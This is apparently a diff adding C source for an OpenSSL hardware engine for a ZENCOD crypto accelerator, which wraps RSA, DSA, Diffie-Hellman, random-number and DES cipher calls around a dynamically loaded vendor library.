+static const char *ZENCOD_Fct_sha1_3 = "zenbridge_sha1_do_final";
+
+static const char *ZENCOD_Fct_xdes_1 = "zenbridge_xdes_cipher";
+static const char *ZENCOD_Fct_rc4_1 = "zenbridge_rc4_cipher";
+
+/*
+ * Destructor (complements the "ENGINE_zencod ()" constructor)
+ */
+static int zencod_destroy(ENGINE *e)
+{
+
+    ERR_unload_ZENCOD_strings();
+
+    return 1;
+}
+
+/*
+ * (de)initialisation functions. Control Function
+ */
+static int zencod_init(ENGINE *e)
+{
+
+    t_zencod_test *ptr_0;
+    t_zencod_bytes2bits *ptr_1;
+    t_zencod_bits2bytes *ptr_2;
+    t_zencod_new_number *ptr_3;
+    t_zencod_init_number *ptr_4;
+    t_zencod_rsa_mod_exp *ptr_exp_1;
+    t_zencod_rsa_mod_exp_crt *ptr_exp_2;
+    t_zencod_dsa_do_sign *ptr_dsa_1;
+    t_zencod_dsa_do_verify *ptr_dsa_2;
+    t_zencod_dh_generate_key *ptr_dh_1;
+    t_zencod_dh_compute_key *ptr_dh_2;
+    t_zencod_rand_bytes *ptr_rand_1;
+    t_zencod_math_mod_exp *ptr_math_1;
+    t_zencod_md5_init *ptr_md5_1;
+    t_zencod_md5_update *ptr_md5_2;
+    t_zencod_md5_do_final *ptr_md5_3;
+    t_zencod_sha1_init *ptr_sha1_1;
+    t_zencod_sha1_update *ptr_sha1_2;
+    t_zencod_sha1_do_final *ptr_sha1_3;
+    t_zencod_xdes_cipher *ptr_xdes_1;
+    t_zencod_rc4_cipher *ptr_rc4_1;
+
+    CHEESE();
+
+    /*
+     * We Should add some tests for non NULL parameters or bad value !!
+     * Stuff to be done ...
+     */
+
+    if (zencod_dso != NULL) {
+        ZENCODerr(ZENCOD_F_ZENCOD_INIT, ZENCOD_R_ALREADY_LOADED);
+        goto err;
+    }
+    /*
+     * Trying to load the Library "cryptozen"
+     */
+    zencod_dso = DSO_load(NULL, ZENCOD_LIBNAME, NULL, 0);
+    if (zencod_dso == NULL) {
+        ZENCODerr(ZENCOD_F_ZENCOD_INIT, ZENCOD_R_DSO_FAILURE);
+        goto err;
+    }
+
+    /*
+     * Trying to load Function from the Library
+     */
+    if (!
+        (ptr_1 =
+         (t_zencod_bytes2bits *) DSO_bind_func(zencod_dso, ZENCOD_Fct_1))
+|| !(ptr_2 = (t_zencod_bits2bytes *) DSO_bind_func(zencod_dso, ZENCOD_Fct_2))
+|| !(ptr_3 = (t_zencod_new_number *) DSO_bind_func(zencod_dso, ZENCOD_Fct_3))
+|| !(ptr_4 = (t_zencod_init_number *) DSO_bind_func(zencod_dso, ZENCOD_Fct_4))
+|| !(ptr_exp_1 =
+     (t_zencod_rsa_mod_exp *) DSO_bind_func(zencod_dso, ZENCOD_Fct_exp_1))
+|| !(ptr_exp_2 =
+     (t_zencod_rsa_mod_exp_crt *) DSO_bind_func(zencod_dso, ZENCOD_Fct_exp_2))
+|| !(ptr_dsa_1 =
+     (t_zencod_dsa_do_sign *) DSO_bind_func(zencod_dso, ZENCOD_Fct_dsa_1))
+|| !(ptr_dsa_2 =
+     (t_zencod_dsa_do_verify *) DSO_bind_func(zencod_dso, ZENCOD_Fct_dsa_2))
+|| !(ptr_dh_1 =
+     (t_zencod_dh_generate_key *) DSO_bind_func(zencod_dso, ZENCOD_Fct_dh_1))
+|| !(ptr_dh_2 =
+     (t_zencod_dh_compute_key *) DSO_bind_func(zencod_dso, ZENCOD_Fct_dh_2))
+|| !(ptr_rand_1 =
+     (t_zencod_rand_bytes *) DSO_bind_func(zencod_dso, ZENCOD_Fct_rand_1))
+|| !(ptr_math_1 =
+     (t_zencod_math_mod_exp *) DSO_bind_func(zencod_dso, ZENCOD_Fct_math_1))
+|| !(ptr_0 = (t_zencod_test *) DSO_bind_func(zencod_dso, ZENCOD_Fct_0))
+|| !(ptr_md5_1 =
+     (t_zencod_md5_init *) DSO_bind_func(zencod_dso, ZENCOD_Fct_md5_1))
+|| !(ptr_md5_2 =
+     (t_zencod_md5_update *) DSO_bind_func(zencod_dso, ZENCOD_Fct_md5_2))
+|| !(ptr_md5_3 =
+     (t_zencod_md5_do_final *) DSO_bind_func(zencod_dso, ZENCOD_Fct_md5_3))
+|| !(ptr_sha1_1 =
+     (t_zencod_sha1_init *) DSO_bind_func(zencod_dso, ZENCOD_Fct_sha1_1))
+|| !(ptr_sha1_2 =
+     (t_zencod_sha1_update *) DSO_bind_func(zencod_dso, ZENCOD_Fct_sha1_2))
+|| !(ptr_sha1_3 =
+     (t_zencod_sha1_do_final *) DSO_bind_func(zencod_dso, ZENCOD_Fct_sha1_3))
+|| !(ptr_xdes_1 =
+     (t_zencod_xdes_cipher *) DSO_bind_func(zencod_dso, ZENCOD_Fct_xdes_1))
+|| !(ptr_rc4_1 =
+     (t_zencod_rc4_cipher *) DSO_bind_func(zencod_dso, ZENCOD_Fct_rc4_1))) {
+
+        ZENCODerr(ZENCOD_F_ZENCOD_INIT, ZENCOD_R_DSO_FAILURE);
+        goto err;
+    }
+
+    /*
+     * The function from "cryptozen" Library have been correctly loaded so
+     * copy them
+     */
+    ptr_zencod_test = ptr_0;
+    ptr_zencod_bytes2bits = ptr_1;
+    ptr_zencod_bits2bytes = ptr_2;
+    ptr_zencod_new_number = ptr_3;
+    ptr_zencod_init_number = ptr_4;
+    ptr_zencod_rsa_mod_exp = ptr_exp_1;
+    ptr_zencod_rsa_mod_exp_crt = ptr_exp_2;
+    ptr_zencod_dsa_do_sign = ptr_dsa_1;
+    ptr_zencod_dsa_do_verify = ptr_dsa_2;
+    ptr_zencod_dh_generate_key = ptr_dh_1;
+    ptr_zencod_dh_compute_key = ptr_dh_2;
+    ptr_zencod_rand_bytes = ptr_rand_1;
+    ptr_zencod_math_mod_exp = ptr_math_1;
+    ptr_zencod_test = ptr_0;
+    ptr_zencod_md5_init = ptr_md5_1;
+    ptr_zencod_md5_update = ptr_md5_2;
+    ptr_zencod_md5_do_final = ptr_md5_3;
+    ptr_zencod_sha1_init = ptr_sha1_1;
+    ptr_zencod_sha1_update = ptr_sha1_2;
+    ptr_zencod_sha1_do_final = ptr_sha1_3;
+    ptr_zencod_xdes_cipher = ptr_xdes_1;
+    ptr_zencod_rc4_cipher = ptr_rc4_1;
+
+    /*
+     * We should peform a test to see if there is actually any unit runnig on
+     * the system ... Even if the cryptozen library is loaded the module coul
+     * not be loaded on the system ... For now we may just open and close the
+     * device !!
+     */
+
+    if (ptr_zencod_test() != 0) {
+        ZENCODerr(ZENCOD_F_ZENCOD_INIT, ZENCOD_R_UNIT_FAILURE);
+        goto err;
+    }
+
+    return 1;
+ err:
+    if (zencod_dso) {
+        DSO_free(zencod_dso);
+    }
+    zencod_dso = NULL;
+    ptr_zencod_bytes2bits = NULL;
+    ptr_zencod_bits2bytes = NULL;
+    ptr_zencod_new_number = NULL;
+    ptr_zencod_init_number = NULL;
+    ptr_zencod_rsa_mod_exp = NULL;
+    ptr_zencod_rsa_mod_exp_crt = NULL;
+    ptr_zencod_dsa_do_sign = NULL;
+    ptr_zencod_dsa_do_verify = NULL;
+    ptr_zencod_dh_generate_key = NULL;
+    ptr_zencod_dh_compute_key = NULL;
+    ptr_zencod_rand_bytes = NULL;
+    ptr_zencod_math_mod_exp = NULL;
+    ptr_zencod_test = NULL;
+    ptr_zencod_md5_init = NULL;
+    ptr_zencod_md5_update = NULL;
+    ptr_zencod_md5_do_final = NULL;
+    ptr_zencod_sha1_init = NULL;
+    ptr_zencod_sha1_update = NULL;
+    ptr_zencod_sha1_do_final = NULL;
+    ptr_zencod_xdes_cipher = NULL;
+    ptr_zencod_rc4_cipher = NULL;
+
+    return 0;
+}
+
+static int zencod_finish(ENGINE *e)
+{
+
+    CHEESE();
+
+    /*
+     * We Should add some tests for non NULL parameters or bad value !!
+     * Stuff to be done ...
+     */
+    if (zencod_dso == NULL) {
+        ZENCODerr(ZENCOD_F_ZENCOD_FINISH, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+    if (!DSO_free(zencod_dso)) {
+        ZENCODerr(ZENCOD_F_ZENCOD_FINISH, ZENCOD_R_DSO_FAILURE);
+        return 0;
+    }
+
+    zencod_dso = NULL;
+
+    ptr_zencod_bytes2bits = NULL;
+    ptr_zencod_bits2bytes = NULL;
+    ptr_zencod_new_number = NULL;
+    ptr_zencod_init_number = NULL;
+    ptr_zencod_rsa_mod_exp = NULL;
+    ptr_zencod_rsa_mod_exp_crt = NULL;
+    ptr_zencod_dsa_do_sign = NULL;
+    ptr_zencod_dsa_do_verify = NULL;
+    ptr_zencod_dh_generate_key = NULL;
+    ptr_zencod_dh_compute_key = NULL;
+    ptr_zencod_rand_bytes = NULL;
+    ptr_zencod_math_mod_exp = NULL;
+    ptr_zencod_test = NULL;
+    ptr_zencod_md5_init = NULL;
+    ptr_zencod_md5_update = NULL;
+    ptr_zencod_md5_do_final = NULL;
+    ptr_zencod_sha1_init = NULL;
+    ptr_zencod_sha1_update = NULL;
+    ptr_zencod_sha1_do_final = NULL;
+    ptr_zencod_xdes_cipher = NULL;
+    ptr_zencod_rc4_cipher = NULL;
+
+    return 1;
+}
+
+static int zencod_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) ())
+{
+
+    int initialised = ((zencod_dso == NULL) ? 0 : 1);
+
+    CHEESE();
+
+    /*
+     * We Should add some tests for non NULL parameters or bad value !!
+     * Stuff to be done ...
+     */
+    switch (cmd) {
+    case ZENCOD_CMD_SO_PATH:
+        if (p == NULL) {
+            ZENCODerr(ZENCOD_F_ZENCOD_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            ZENCODerr(ZENCOD_F_ZENCOD_CTRL, ZENCOD_R_ALREADY_LOADED);
+            return 0;
+        }
+        ZENCOD_LIBNAME = (const char *)p;
+        return 1;
+    default:
+        break;
+    }
+
+    ZENCODerr(ZENCOD_F_ZENCOD_CTRL, ZENCOD_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+
+    return 0;
+}
+
+/*
+ * BIGNUM stuff Functions
+ */
+static int zencod_bn_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx)
+{
+    zen_nb_t y, x, e, n;
+    int ret;
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_BN_MOD_EXP, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+
+    if (!bn_wexpand(r, m->top + 1)) {
+        ENGINEerr(ZENCOD_F_ZENCOD_BN_MOD_EXP, ZENCOD_R_BN_EXPAND_FAIL);
+        return 0;
+    }
+
+    memset(r->d, 0, BN_num_bytes(m));
+
+    ptr_zencod_init_number(&y, (r->dmax - 1) * sizeof(BN_ULONG) * 8,
+                           (unsigned char *)r->d);
+    BIGNUM2ZEN(&x, a);
+    BIGNUM2ZEN(&e, p);
+    BIGNUM2ZEN(&n, m);
+
+    /* Must invert x and e parameter due to BN mod exp prototype ... */
+    ret = ptr_zencod_math_mod_exp(&y, &e, &x, &n);
+
+    if (ret) {
+        PERROR("zenbridge_math_mod_exp");
+        ENGINEerr(ZENCOD_F_ZENCOD_BN_MOD_EXP, ZENCOD_R_REQUEST_FAILED);
+        return 0;
+    }
+
+    r->top = (BN_num_bits(m) + BN_BITS2 - 1) / BN_BITS2;
+
+    return 1;
+}
+
+/*
+ * RSA stuff Functions
+ */
+#  ifndef OPENSSL_NO_RSA
+static int RSA_zencod_rsa_mod_exp(BIGNUM *r0, const BIGNUM *i, RSA *rsa)
+{
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_RSA_MOD_EXP_CRT, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+
+    if (!rsa->p || !rsa->q || !rsa->dmp1 || !rsa->dmq1 || !rsa->iqmp) {
+        ENGINEerr(ZENCOD_F_ZENCOD_RSA_MOD_EXP_CRT,
+                  ZENCOD_R_BAD_KEY_COMPONENTS);
+        return 0;
+    }
+
+    /* Do in software if argument is too large for hardware */
+    if (RSA_size(rsa) * 8 > ZENBRIDGE_MAX_KEYSIZE_RSA_CRT) {
+        const RSA_METHOD *meth;
+
+        meth = RSA_PKCS1_SSLeay();
+        return meth->rsa_mod_exp(r0, i, rsa);
+    } else {
+        zen_nb_t y, x, p, q, dmp1, dmq1, iqmp;
+
+        if (!bn_expand(r0, RSA_size(rsa) * 8)) {
+            ENGINEerr(ZENCOD_F_ZENCOD_RSA_MOD_EXP_CRT,
+                      ZENCOD_R_BN_EXPAND_FAIL);
+            return 0;
+        }
+        r0->top = (RSA_size(rsa) * 8 + BN_BITS2 - 1) / BN_BITS2;
+
+        BIGNUM2ZEN(&x, i);
+        BIGNUM2ZEN(&y, r0);
+        BIGNUM2ZEN(&p, rsa->p);
+        BIGNUM2ZEN(&q, rsa->q);
+        BIGNUM2ZEN(&dmp1, rsa->dmp1);
+        BIGNUM2ZEN(&dmq1, rsa->dmq1);
+        BIGNUM2ZEN(&iqmp, rsa->iqmp);
+
+        if (ptr_zencod_rsa_mod_exp_crt(&y, &x, &p, &q, &dmp1, &dmq1, &iqmp) <
+            0) {
+            PERROR("zenbridge_rsa_mod_exp_crt");
+            ENGINEerr(ZENCOD_F_ZENCOD_RSA_MOD_EXP_CRT,
+                      ZENCOD_R_REQUEST_FAILED);
+            return 0;
+        }
+
+        return 1;
+    }
+}
+
+/*
+ * This function is aliased to RSA_mod_exp (with the mont stuff dropped).
+ */
+static int RSA_zencod_bn_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                                 const BIGNUM *m, BN_CTX *ctx,
+                                 BN_MONT_CTX *m_ctx)
+{
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_RSA_MOD_EXP, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+
+    /* Do in software if argument is too large for hardware */
+    if (BN_num_bits(m) > ZENBRIDGE_MAX_KEYSIZE_RSA) {
+        const RSA_METHOD *meth;
+
+        meth = RSA_PKCS1_SSLeay();
+        return meth->bn_mod_exp(r, a, p, m, ctx, m_ctx);
+    } else {
+        zen_nb_t y, x, e, n;
+
+        if (!bn_expand(r, BN_num_bits(m))) {
+            ENGINEerr(ZENCOD_F_ZENCOD_RSA_MOD_EXP, ZENCOD_R_BN_EXPAND_FAIL);
+            return 0;
+        }
+        r->top = (BN_num_bits(m) + BN_BITS2 - 1) / BN_BITS2;
+
+        BIGNUM2ZEN(&x, a);
+        BIGNUM2ZEN(&y, r);
+        BIGNUM2ZEN(&e, p);
+        BIGNUM2ZEN(&n, m);
+
+        if (ptr_zencod_rsa_mod_exp(&y, &x, &n, &e) < 0) {
+            PERROR("zenbridge_rsa_mod_exp");
+            ENGINEerr(ZENCOD_F_ZENCOD_RSA_MOD_EXP, ZENCOD_R_REQUEST_FAILED);
+            return 0;
+        }
+
+        return 1;
+    }
+}
+#  endif                        /* !OPENSSL_NO_RSA */
+
+#  ifndef OPENSSL_NO_DSA
+/*
+ * DSA stuff Functions
+ */
+static DSA_SIG *DSA_zencod_do_sign(const unsigned char *dgst, int dlen,
+                                   DSA *dsa)
+{
+    zen_nb_t p, q, g, x, y, r, s, data;
+    DSA_SIG *sig;
+    BIGNUM *bn_r = NULL;
+    BIGNUM *bn_s = NULL;
+    char msg[20];
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_NOT_LOADED);
+        goto FAILED;
+    }
+
+    if (dlen > 160) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_REQUEST_FAILED);
+        goto FAILED;
+    }
+
+    /* Do in software if argument is too large for hardware */
+    if (BN_num_bits(dsa->p) > ZENBRIDGE_MAX_KEYSIZE_DSA_SIGN ||
+        BN_num_bits(dsa->g) > ZENBRIDGE_MAX_KEYSIZE_DSA_SIGN) {
+        const DSA_METHOD *meth;
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_BAD_KEY_COMPONENTS);
+        meth = DSA_OpenSSL();
+        return meth->dsa_do_sign(dgst, dlen, dsa);
+    }
+
+    if (!(bn_s = BN_new()) || !(bn_r = BN_new())) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_BAD_KEY_COMPONENTS);
+        goto FAILED;
+    }
+
+    if (!bn_expand(bn_r, 160) || !bn_expand(bn_s, 160)) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_BN_EXPAND_FAIL);
+        goto FAILED;
+    }
+
+    bn_r->top = bn_s->top = (160 + BN_BITS2 - 1) / BN_BITS2;
+    BIGNUM2ZEN(&p, dsa->p);
+    BIGNUM2ZEN(&q, dsa->q);
+    BIGNUM2ZEN(&g, dsa->g);
+    BIGNUM2ZEN(&x, dsa->priv_key);
+    BIGNUM2ZEN(&y, dsa->pub_key);
+    BIGNUM2ZEN(&r, bn_r);
+    BIGNUM2ZEN(&s, bn_s);
+    q.len = x.len = 160;
+
+    ypcmem(msg, dgst, 20);
+    ptr_zencod_init_number(&data, 160, msg);
+
+    if (ptr_zencod_dsa_do_sign(0, &data, &y, &p, &q, &g, &x, &r, &s) < 0) {
+        PERROR("zenbridge_dsa_do_sign");
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_REQUEST_FAILED);
+        goto FAILED;
+    }
+
+    if (!(sig = DSA_SIG_new())) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_REQUEST_FAILED);
+        goto FAILED;
+    }
+    sig->r = bn_r;
+    sig->s = bn_s;
+    return sig;
+
+ FAILED:
+    if (bn_r)
+        BN_free(bn_r);
+    if (bn_s)
+        BN_free(bn_s);
+    return NULL;
+}
+
+static int DSA_zencod_do_verify(const unsigned char *dgst, int dlen,
+                                DSA_SIG *sig, DSA *dsa)
+{
+    zen_nb_t data, p, q, g, y, r, s, v;
+    char msg[20];
+    char v_data[20];
+    int ret;
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_VERIFY, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+
+    if (dlen > 160) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_REQUEST_FAILED);
+        return 0;
+    }
+
+    /* Do in software if argument is too large for hardware */
+    if (BN_num_bits(dsa->p) > ZENBRIDGE_MAX_KEYSIZE_DSA_SIGN ||
+        BN_num_bits(dsa->g) > ZENBRIDGE_MAX_KEYSIZE_DSA_SIGN) {
+        const DSA_METHOD *meth;
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_SIGN, ZENCOD_R_BAD_KEY_COMPONENTS);
+        meth = DSA_OpenSSL();
+        return meth->dsa_do_verify(dgst, dlen, sig, dsa);
+    }
+
+    BIGNUM2ZEN(&p, dsa->p);
+    BIGNUM2ZEN(&q, dsa->q);
+    BIGNUM2ZEN(&g, dsa->g);
+    BIGNUM2ZEN(&y, dsa->pub_key);
+    BIGNUM2ZEN(&r, sig->r);
+    BIGNUM2ZEN(&s, sig->s);
+    ptr_zencod_init_number(&v, 160, v_data);
+    ypcmem(msg, dgst, 20);
+    ptr_zencod_init_number(&data, 160, msg);
+
+    if ((ret =
+         ptr_zencod_dsa_do_verify(0, &data, &p, &q, &g, &y, &r, &s,
+                                  &v)) < 0) {
+        PERROR("zenbridge_dsa_do_verify");
+        ENGINEerr(ZENCOD_F_ZENCOD_DSA_DO_VERIFY, ZENCOD_R_REQUEST_FAILED);
+        return 0;
+    }
+
+    return ((ret == 0) ? 1 : ret);
+}
+
+static int DSA_zencod_bn_mod_exp(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                                 const BIGNUM *p, const BIGNUM *m,
+                                 BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    CHEESE();
+
+    return zencod_bn_mod_exp(r, a, p, m, ctx);
+}
+#  endif                        /* !OPENSSL_NO_DSA */
+
+#  ifndef OPENSSl_NO_DH
+/*
+ * DH stuff Functions
+ */
+static int DH_zencod_generate_key(DH *dh)
+{
+    BIGNUM *bn_prv = NULL;
+    BIGNUM *bn_pub = NULL;
+    zen_nb_t y, x, g, p;
+    int generate_x;
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DH_GENERATE, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+
+    /* Private key */
+    if (dh->priv_key) {
+        bn_prv = dh->priv_key;
+        generate_x = 0;
+    } else {
+        if (!(bn_prv = BN_new())) {
+            ENGINEerr(ZENCOD_F_ZENCOD_DH_GENERATE, ZENCOD_R_BN_EXPAND_FAIL);
+            goto FAILED;
+        }
+        generate_x = 1;
+    }
+
+    /* Public key */
+    if (dh->pub_key)
+        bn_pub = dh->pub_key;
+    else if (!(bn_pub = BN_new())) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DH_GENERATE, ZENCOD_R_BN_EXPAND_FAIL);
+        goto FAILED;
+    }
+
+    /* Expand */
+    if (!bn_wexpand(bn_prv, dh->p->dmax) || !bn_wexpand(bn_pub, dh->p->dmax)) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DH_GENERATE, ZENCOD_R_BN_EXPAND_FAIL);
+        goto FAILED;
+    }
+    bn_prv->top = dh->p->top;
+    bn_pub->top = dh->p->top;
+
+    /* Convert all keys */
+    BIGNUM2ZEN(&p, dh->p);
+    BIGNUM2ZEN(&g, dh->g);
+    BIGNUM2ZEN(&y, bn_pub);
+    BIGNUM2ZEN(&x, bn_prv);
+    x.len = DH_size(dh) * 8;
+
+    /* Adjust the lengths of P and G */
+    p.len = ptr_zencod_bytes2bits(p.data, ZEN_BYTES(p.len));
+    g.len = ptr_zencod_bytes2bits(g.data, ZEN_BYTES(g.len));
+
+    /* Send the request to the driver */
+    if (ptr_zencod_dh_generate_key(&y, &x, &g, &p, generate_x) < 0) {
+        perror("zenbridge_dh_generate_key");
+        ENGINEerr(ZENCOD_F_ZENCOD_DH_GENERATE, ZENCOD_R_REQUEST_FAILED);
+        goto FAILED;
+    }
+
+    dh->priv_key = bn_prv;
+    dh->pub_key = bn_pub;
+
+    return 1;
+
+ FAILED:
+    if (!dh->priv_key && bn_prv)
+        BN_free(bn_prv);
+    if (!dh->pub_key && bn_pub)
+        BN_free(bn_pub);
+
+    return 0;
+}
+
+static int DH_zencod_compute_key(unsigned char *key, const BIGNUM *pub_key,
+                                 DH *dh)
+{
+    zen_nb_t y, x, p, k;
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DH_COMPUTE, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+
+    if (!dh->priv_key) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DH_COMPUTE, ZENCOD_R_BAD_KEY_COMPONENTS);
+        return 0;
+    }
+
+    /* Convert all keys */
+    BIGNUM2ZEN(&y, pub_key);
+    BIGNUM2ZEN(&x, dh->priv_key);
+    BIGNUM2ZEN(&p, dh->p);
+    ptr_zencod_init_number(&k, p.len, key);
+
+    /* Adjust the lengths */
+    p.len = ptr_zencod_bytes2bits(p.data, ZEN_BYTES(p.len));
+    y.len = ptr_zencod_bytes2bits(y.data, ZEN_BYTES(y.len));
+    x.len = ptr_zencod_bytes2bits(x.data, ZEN_BYTES(x.len));
+
+    /* Call the hardware */
+    if (ptr_zencod_dh_compute_key(&k, &y, &x, &p) < 0) {
+        ENGINEerr(ZENCOD_F_ZENCOD_DH_COMPUTE, ZENCOD_R_REQUEST_FAILED);
+        return 0;
+    }
+
+    /* The key must be written MSB -> LSB */
+    k.len = ptr_zencod_bytes2bits(k.data, ZEN_BYTES(k.len));
+    esrever(key, ZEN_BYTES(k.len));
+
+    return ZEN_BYTES(k.len);
+}
+
+static int DH_zencod_bn_mod_exp(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                                const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                                BN_MONT_CTX *m_ctx)
+{
+    CHEESE();
+
+    return zencod_bn_mod_exp(r, a, p, m, ctx);
+}
+#  endif                        /* !OPENSSL_NO_DH */
+
+/*
+ * RAND stuff Functions
+ */
+static void RAND_zencod_seed(const void *buf, int num)
+{
+    /*
+     * Nothing to do cause our crypto accelerator provide a true random
+     * generator
+     */
+}
+
+static int RAND_zencod_rand_bytes(unsigned char *buf, int num)
+{
+    zen_nb_t r;
+
+    CHEESE();
+
+    if (!zencod_dso) {
+        ENGINEerr(ZENCOD_F_ZENCOD_RAND, ZENCOD_R_NOT_LOADED);
+        return 0;
+    }
+
+    ptr_zencod_init_number(&r, num * 8, buf);
+
+    if (ptr_zencod_rand_bytes(&r, ZENBRIDGE_RNG_DIRECT) < 0) {
+        PERROR("zenbridge_rand_bytes");
+        ENGINEerr(ZENCOD_F_ZENCOD_RAND, ZENCOD_R_REQUEST_FAILED);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int RAND_zencod_rand_status(void)
+{
+    CHEESE();
+
+    return 1;
+}
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifdef ENGINE_DYNAMIC_SUPPORT
+static int bind_fn(ENGINE *e, const char *id)
+{
+
+    if (id && (strcmp(id, engine_zencod_id) != 0)) {
+        return 0;
+    }
+    if (!bind_helper(e)) {
+        return 0;
+    }
+
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* ENGINE_DYNAMIC_SUPPORT */
+    /*
+     * Adding "Digest" and "Cipher" tools ...
+     * This is in development ... ;-)
+     * In orfer to code this, i refer to hw_openbsd_dev_crypto and openssl engine made by Geoff Thorpe (if i'm rigth),
+     * and evp, sha md5 definitions etc ...
+     */
+/* First add some include ... */
+#  include <openssl/evp.h>
+#  include <openssl/sha.h>
+#  include <openssl/md5.h>
+#  include <openssl/rc4.h>
+#  include <openssl/des.h>
+/* Some variables declaration ... */
+    /*
+     * DONS: Disable symetric computation except DES and 3DES, but let part
+     * of the code
+     */
+/* static int engine_digest_nids [ ] = { NID_sha1, NID_md5 } ; */
+static int engine_digest_nids[] = { };
+
+static int engine_digest_nids_num = 0;
+/*
+ * static int engine_cipher_nids [ ] = { NID_rc4, NID_rc4_40, NID_des_cbc,
+ * NID_des_ede3_cbc } ;
+ */
+static int engine_cipher_nids[] = { NID_des_cbc, NID_des_ede3_cbc };
+
+static int engine_cipher_nids_num = 2;
+
+/* Function prototype ... */
+/*  SHA stuff */
+static int engine_sha1_init(EVP_MD_CTX *ctx);
+static int engine_sha1_update(EVP_MD_CTX *ctx, const void *data,
+                              unsigned long count);
+static int engine_sha1_final(EVP_MD_CTX *ctx, unsigned char *md);
+
+/*  MD5 stuff */
+static int engine_md5_init(EVP_MD_CTX *ctx);
+static int engine_md5_update(EVP_MD_CTX *ctx, const void *data,
+                             unsigned long count);
+static int engine_md5_final(EVP_MD_CTX *ctx, unsigned char *md);
+
+static int engine_md_cleanup(EVP_MD_CTX *ctx);
+static int engine_md_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from);
+
+/* RC4 Stuff */
+static int engine_rc4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc);
+static int engine_rc4_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, unsigned int inl);
+
+/* DES Stuff */
+static int engine_des_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc);
+static int engine_des_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                 const unsigned char *in, unsigned int inl);
+
+/*  3DES Stuff */
+static int engine_des_ede3_init_key(EVP_CIPHER_CTX *ctx,
+                                    const unsigned char *key,
+                                    const unsigned char *iv, int enc);
+static int engine_des_ede3_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                      const unsigned char *in,
+                                      unsigned int inl);
+
+static int engine_cipher_cleanup(EVP_CIPHER_CTX *ctx); /* cleanup ctx */
+
+/* The one for SHA ... */
+static const EVP_MD engine_sha1_md = {
+    NID_sha1,
+    NID_sha1WithRSAEncryption,
+    SHA_DIGEST_LENGTH,
+    EVP_MD_FLAG_ONESHOT,
+    /*
+     * 0,
+     *//*
+     * EVP_MD_FLAG_ONESHOT = x0001 digest can only handle a single block *
+     * XXX: set according to device info ...
+     */
+    engine_sha1_init,
+    engine_sha1_update,
+    engine_sha1_final,
+    engine_md_copy,             /* dev_crypto_sha_copy */
+    engine_md_cleanup,          /* dev_crypto_sha_cleanup */
+    EVP_PKEY_RSA_method,
+    SHA_CBLOCK,
+    /* sizeof ( EVP_MD * ) + sizeof ( SHA_CTX ) */
+    sizeof(ZEN_MD_DATA)
+        /*
+         * sizeof ( MD_CTX_DATA ) The message digest data structure ...
+         */
+};
+
+/* The one for MD5 ... */
+static const EVP_MD engine_md5_md = {
+    NID_md5,
+    NID_md5WithRSAEncryption,
+    MD5_DIGEST_LENGTH,
+    EVP_MD_FLAG_ONESHOT,
+    /*
+     * 0,
+     *//*
+     * EVP_MD_FLAG_ONESHOT = x0001 digest can only handle a single block *
+     * XXX: set according to device info ...
+     */
+    engine_md5_init,
+    engine_md5_update,
+    engine_md5_final,
+    engine_md_copy,             /* dev_crypto_md5_copy */
+    engine_md_cleanup,          /* dev_crypto_md5_cleanup */
+    EVP_PKEY_RSA_method,
+    MD5_CBLOCK,
